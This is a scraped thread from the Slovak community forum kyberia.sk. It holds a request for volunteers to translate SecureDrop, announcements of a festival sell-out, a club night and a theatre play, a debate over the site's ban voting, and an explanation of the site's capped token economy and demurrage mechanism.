    Vzhladom na to, ze z postov svena alebo max.g nevyplyva, ze propaguju nacisticke nazory, ako sa to tu oznacuje, vyzyvam ludi, ktori nesuhlasia s tym, aby boli ostrakizovani, aby zahlasovali za zvysenie potrebneho poctu na ostrakizaciu tu: https://kyberia.sk/id/7823390 alebo za vypnutie ostrakizacneho skriptu tu: https://kyberia.sk/id/7844623

    v tomto momente je hodnota 12K s rozdielom 3 kaciek pred hodnotou 77K.

    Kedze mi to pride, ze sa tu deje hon na carodejnice, ktory kyberii podla mna nijak neprispeje, zvazte prosim zahlasovania za vyssiu hodnotu potrebnu na zabanovanie cloveka.
    more children: (2)
  • 000001010000000108656318
    Synapse creator 26.08.2019 - 13:14:48 (modif: 26.08.2019 - 16:11:38) level: 1 UP [28K] New Hardlink Content changed
    Ahoj, spolu s neOrganizaciou PISK.cz (pisk.sk) sme sa rozhodli pomoct investigativnej zurnalistike na Slovensku a v Cechach. Nasim cielom je pomoct nasadit softver, SecureDrop, ktory sluzi na bezpecne prijimanie dokumentov a komunikacie z anonymnych zdrojov. Aby sme sa mohli posunut dalej, tak potrebujeme prelozit potrebny softver do nasich jazykov.

    Aktualny stav je cestina 37% hotova, slovencina 75%


    Tu je jednoduchy navod ako na to -> https://docs.securedrop.org/en/release-0.13.1/development/l10n.html
    https://weblate.securedrop.org/projects/securedrop/securedrop/cs/
    https://weblate.securedrop.org/projects/securedrop/securedrop/sk/


    Ak si najdete chvilu cas, budeme radi za vasu pomoc s prekladom (pripadne za zdielanie s niekym kto by mohol/vedel pomoct) a dakujeme vsetkym ktori doteraz tak urobili!



    e: external_access = true // tak mozete kludne zdielat cez ine socialne media
    more children: (3)
  • 000001010000000108641379
    Synapse creator 04.07.2019 - 15:40:17 level: 1 UP New Hardlink
    festival-pohoda-2019-je-vypredany-dakujeme.1562245181@2x.png

    Už týždeň pred otvorením brán 23-teho ročníka Pohody sme naplnili kapacitu nášho festivalu. Lístky na Pohodu sa už nedajú kúpiť na našom webe, ani u oficiálnych predpredajcov a nebude to možné ani na bránach. V našom shope ešte ostáva posledných 100 miest v stanovom hoteli Tent Inn a približne 500 miest na parkovanie v sektore P4 či lístky na mimoriadnu dopravu na festival. Vypredaná Pohoda je skvelou správou pre celý organizačný tím a perfektný darček k dnešným Michalovým narodeninám. Ďakujeme za váš obrovský záujem a tešíme sa na vás už o týždeň na Pohode 2019.
  • 000001010000000108636571
    Synapse creator 18.06.2019 - 14:04:22 (modif: 18.06.2019 - 14:06:18) level: 1 UP [4K] New Hardlink Content changed
    more children: (1)
  • 000001010000000108631401
    Synapse creator 31.05.2019 - 21:51:03 (modif: 31.05.2019 - 21:52:57) level: 1 UP [4K] New Hardlink Content changed
    Ahojte, trosku last-minute notice, ale dnes robime prvu Elektro Haflu, noc venovanu klubovej hudbe Blizkeho vychodu & beyond.

    Lineup: DJ Ramzy al Spinoza, Tropikal Camel, Mooshak, DJ Džbán

    + dnešné menü vodných fajok (already tried, výborné tabaky!)
    0-D289-CAE-F158-4037-A317-584-E255-F11-D7.jpg

    Príďte :)

    fb event: https://www.facebook.com/events/749503308778458
  • 000001010000000108623146
    Synapse creator 08.05.2019 - 11:51:49 (modif: 08.05.2019 - 12:42:23) level: 1 UP [10K] New Hardlink Content changed
    Ahoj. Ok, pokúsim sa aspoň zbežne vysvetliť o čo tu beží. Každopádne ak vieš anglicky, tak odporúčam prečítať si rovno Kyberia's Open Ledger Roadmap článok, tam je všetko popísané o dosť detailnejšie.

    Takže stručne a polopate: nie, pridanie príspevku Ťa nestojí 300K. Ako si všimneš tu, všetky transakcie typu P ("P" ako publikuj) stoja tak ako doposiaľ vždy v minulosti jedno K.

    A teraz k veci: dlhé roky fungovala ekonomika kyberie prudko inflačným spôsobom, t.j. každý deň dostal každý užívateľ 30K takpovediac z ničoho, v podstate sa jednalo o tzv. "infinite supply" stav kde množstvo K ktoré boli vypustené do obehu mohlo byť teoreticky nekonečné.

    Aj napriek tomu že také K nemali prakticky žiadnú hodnotu (akokoľvek veľké číslo vydelené nekonečnom je nula), veľa ľudí si ku K vypestovalo určitý sentiment akoby sa jednalo o určitý nositeľ hodnoty a viac ako polovina z 500 užívateľov ktorý odpovedali v ankete na maine: dokonca aj takej prťavo malej časti nekonečna prisúdila monetárnu hodnotu vyššiu ako 1 cent.

    K čomu došlo v prechode na Kyberia Open Ledger alias KOL, alias Kybchain, ktorý sa spustil v júni minulého roka, bolo, že sa stanovilo maximálne množstvo obeživa na 10 miliónov K a vytvorili sa mechanizmy na to aby toto obeživo vrámci komunity začalo cirkulovať.

    Ako nás poučila nedávna minulosť (viz. úspech Bitcoinu či iných mien kde je maximálne množstvo obeživa pevne stanovené), ekonomické hry kde je všetkým účastníkom jasné koľko obeživa cirkuluje, sú pre ľudí značne príťažlivé.

    Z akéhosi dôvodu sú ľudia od nepamäti schopní - a častokrát aj viac ako ochotní - určitým znakom ktoré kódujú informáciu o priebehu sociálnych interakcií (niekedy pre také "znaky ktoré kódujú informáciu o priebehu sociálnych interakcií" aj slovo "token", v minulosti sa často používalo slovo "peniaze") priradiť reálnu hodnotu ajkeď tam na začiatku žiadna reálna hodnota nemusela byť.

    A ako nám naznačil Bitcoin&co. vedomosť o maximálnom množstve obeživa ktoré v systéme cirkuluje je faktorom ktorý pri "reifikácii", zreálňovaní hodnoty určitého tokenu, zohráva pre ľudí dôležitú rolu.

    To, k čomu došlo na kyberii pre prechode z "infinite supply" na "market cap = 10megaK" systému je súčasťou takého zreálňovania. Kčka už niesú len pičovinka ktorou sa kybčatrolli môžu vzájomne tlapkať po ramenách, stávajú sa reálnym tokenom ktorý možno prijať, odovzdať (napr. pomocou funkcie give) či naň dokonca naviazať transakcie z reálneho sveta.

    Ja som napr. prednedávnom pár stovák K vymenil za jednu knižku, a jeden starý časák za pár desiatok K pustil z rúk...

    Po vysvetlení dôvodov ktoré ma viedli k implementácii tejto, "srandy" teraz k druhej časti Tvojej otázky a totiž, čo je to "demurrage" a prečo vlastne.

    Demurrage si môžeš laicky vysvetliť ako najrovnejšiu zo všetkých daní. Daň tak rovnú, až sa prakticky jedná o prírodný zákon (niečo ako entropia v termodynamike, zdravím id niekt0). Je prejavom princípu, že všetko čo existuje v čase postupne zaniká a zaniká to preto, aby mohlo byť podporené niečo čo ešte do času nevstúpilo.

    V kontexte Kyberie bolo zavedenie "demurrage" nutnosťou, keď som chcel zachovať pôvodnú funkcionalitu ktorú možno popísať slovami: "každý užívateľ dostal určitý denný prídeľ K". V minulsti to nebol problém, Kčka sa generovali "ex nihilo".

    Avšak za situácie kedy je, ako som vyššie popísal, počet K konečný a pevne daný, môže byť prídeľ nových K zabezpečený len tak, že tie K niekde inde zoberieš.

    Preto sa na kyberii aplikuje demurrage, pričom o parametroch ktoré určujú ako veľmi a ako často sa demurrage realizuje, rozhoduje a bude rozhodovať Agora, napr. tu https://kyberia.sk/id/8519102

    Technicky sa demurrage realizuje tak, že na serveroch kyberie sa v pravidelných intervaloch spúšťa skript, ktorý zo všetkých účtov evidovaných v KOL registri odoberie určitú časť a tú presunie na bota menom Ganéš.

    V ďaľšom kroku následne Ganéš všetko vyzbierané rozdá ľuďom na základe určitých kritérií, o ktorých tiež rozhoduje Agora.

    Od včera večera už by sa malo všetko vyššie popísané diať úplne automaticky, bez nutnosti zásahu ľudského operátora.

    Toť vskrakte na začiatok všetko, je toho samozrejme viac - zatiaľ som prakticky vôbec nespomenul blockchain či crypto-signatúry - ale ako jemná iniciácia do problematiky to bude dúfam stačiť.

    D.

    Wenn es etwas im Leben gibt, dass die menschliche Seele anspricht, dann ist es Liebe und Schönheit.
    more children: (3)
  • 000001010000000108618275 more children: (5)
  • 000001010000000108610327
    Synapse creator 28.03.2019 - 01:10:19 (modif: 31.07.2019 - 15:03:25) level: 1 UP [5K] New Hardlink Content changed
    V sekcii kybchain pribudla možnosť darovať ľubovoľnú časť Tvojich tokenov na ľubovoľného iného užívateľa, funguje to následovne:

    ako RECEPTOR_ID (povinny udaj) uvedieš kyberia ID človeka ktorého chceš "obdarovať"
    ako GIVE_AMOUNT (povinny udaj) uvedieš obnos ktorý chceš podarovať môže byť aj veľmi malý zlomok
    ako MEMO (nepovinny udaj) môžeš uviesť popis Tvojho Daru, je to niečo ako "variabilný symbol"
    ako PASSWORD (povinný údaj) uvedieš Tvoje kyberia heslo (triviálna forma zabezpečenia proti krádeži ale stále IMHO lepšie ako nič)

    Následne klikneš na tlačítko GIVE a voilá, do transakčného registra práve pribudla transakcia typu G.

    * samozrejme že sa tu bavíme len o daroch a darovaní, o predaji či iných aktivitách na ktoré sa vzťahujú explicitné zákonné regulácie tu, samozrejme ;), nieje reč...

    Wenn es etwas im Leben gibt, dass die menschliche Seele anspricht, dann ist es Liebe und Schönheit.
  • 000001010000000108604486
    Synapse creator 11.03.2019 - 17:26:18 (modif: 12.03.2019 - 15:08:22) level: 1 UP [2K] New Hardlink Content changed
    edit: kvôli chorobe zrušené :/ bude nový termín, aj s debatou, be in touch

    Ahojte,
    zajtra (12.3.) sa v novom divadelnom priestore v Bratislave, na Mieste M na Mickiewiczovej 2, koná repríza vNořen, hry zameranej na feminizmus na motívy Ibsenovej Nory. Po divadle bude nasledovať diskusia s babami z Kundy crew.

    Začiatok je o 19:30, lístky sú v predaji cez Tootoot.fm tuto: https://tootoot.fm/en/events/5c77fb50018043028c83f64a?fbclid=IwAR0qPRkKF0mpL0wBZBpTW4lvM5h9GY6YeoxQgJ0OmIYmHlW-T_aVM76QA8A

    Facebook event tu: https://www.facebook.com/events/353612021911836/

    Môžem odporučiť, radi vás tam uvidíme :)

    vnoren9.jpg?itok=gC80w8p7
  • 000001010000000108597490
    Synapse creator 19.02.2019 - 13:08:23 level: 1 UP [4K] New Hardlink
    Ahojte, 9. marca budú bristolské legendy Giant Swan v Novej Cvernovke na Nočnej, veľmi sa na to tešíme. Pridajte sa k nám, bude to veľkolepé :)

    Teaser:

    Nočná, 9.3. @ Nová Cvernovka ▅ Giant Swan―UK ▀ Loktibrada―SK ▌Její Vály―CZ ✚ friends from Matwe Kaščák on Vimeo.



    FB event: https://www.facebook.com/events/331740937435965/